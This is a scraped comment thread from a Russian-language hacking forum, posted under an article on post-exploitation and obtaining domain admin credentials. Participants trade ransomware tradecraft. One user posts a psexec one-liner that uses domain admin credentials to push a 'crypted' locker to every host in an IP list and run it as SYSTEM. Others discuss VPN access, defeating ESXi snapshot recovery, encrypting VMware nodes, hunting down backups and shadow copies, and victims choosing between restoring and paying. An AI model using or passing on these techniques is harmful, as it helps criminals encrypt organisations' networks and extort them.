• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Пост эксплуатация не покидая виндовс (получение учетки домен админа)

Отслеживать
caxmd сказал(а):
Правереал пора штуки Fortinet и ничиво не выходит
Потому что пару штук, а не пару сотен..
 
Пожалуйста, обратите внимание, что пользователь заблокирован
risiks сказал(а):
2-3 штуки это не показатель)
Ну я согласно с тобой ,проста так для тест c fortinet. А на pulse vpn идёт прекрасно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
lolita322 сказал(а):
При таком способе в любом случае нужно расшаривать и подключать диски или нет? Софт который ползет по сети не сможет без этого проникнуть?
получил домен админа криптанул локер psexec.exe @ip.txt -u userDA -p passwordDA -s -d -c путь к локеру.exe ждем 5 минут локер запустился на всех тачках от имени системы
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Bassterlord сказал(а):
получил домен админа криптанул локер psexec.exe \\ip.txt -u userDA -p passwordDA -s -d -c петь к локеру.exe ждем 5 минут локер запустился на всех тачках от имени системы
Етого мне нехвало
пытаюсь разобраться сам
ты удали ето ненужное
есче не закрытие сезона охоты на волков

Есть один вопрос
 
Пожалуйста, обратите внимание, что пользователь заблокирован
lerato сказал(а):
Етого мне нехвало
пытаюсь разобраться сам
ты удали ето ненужное
есче не закрытие сезона охоты на волков

Есть один вопрос
что нужно а что нет я сам разберусь
насчет охоты на волков мне советы ни твои ни чьи либо не нужны что я делаю это мое дело но никак не твое
если вопросы есть по существу пиши
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Bassterlord сказал(а):
что нужно а что нет я сам разберусь
насчет охоты на волков мне советы ни твои ни чьи либо не нужны что я делаю это мое дело но никак не твое
если вопросы есть по существу пиши
сильнейшее колдунство про которое я слыхал, статья the best! продолжай держать планку нереального контента.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Bassterlord сказал(а):
получил домен админа криптанул локер psexec.exe \\ip.txt -u userDA -p passwordDA -s -d -c путь к локеру.exe ждем 5 минут локер запустился на всех тачках от имени системы
5 минут и админ все востановил со снепшетов esxi)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
boriselcin сказал(а):
5 минут и админ все востановил со снепшетов esxi)
не всегда есиксы то еще гумно согласен
 
Пожалуйста, обратите внимание, что пользователь заблокирован
boriselcin сказал(а):
5 минут и админ все востановил со снепшетов esxi)
может сделаешь ман по их эксплоиту?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
boriselcin сказал(а):
5 минут и админ все востановил со снепшетов esxi)
согласись не всегда компания рискует делать бекапы так как бекап системы у них установлены НО они не всегда тестируются и тут перед админом есть выбор либо делать бекап с риском что чтото пойдет не так либо платить
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Bassterlord сказал(а):
согласись не всегда компания рискует делать бекапы так как бекап системы у них установлены НО они не всегда тестируются и тут перед админом есть выбор либо делать бекап с риском что чтото пойдет не так либо платить
Ты смотри всторону шифрования самих нод вмвары
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Народ, я собираю информацию по методам поиска бэккапов в сетях. Если кто видел статьи(или другие работы) и они показались вам достойными внимания поделитесь пожалуйста. Язык статей не имеет значение - переведем и пусть у нас на форуме лежит. Может кто то из местных своими поделится знаниями ( врятли конечно на все же ). Тем кто недавно начал с сетями воевать очень интересно будует почитать про то, как производится обнаружение бэккапов\теневых копий\снэпшотов и прочих видов резервных источников восстановления. Спасибо.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх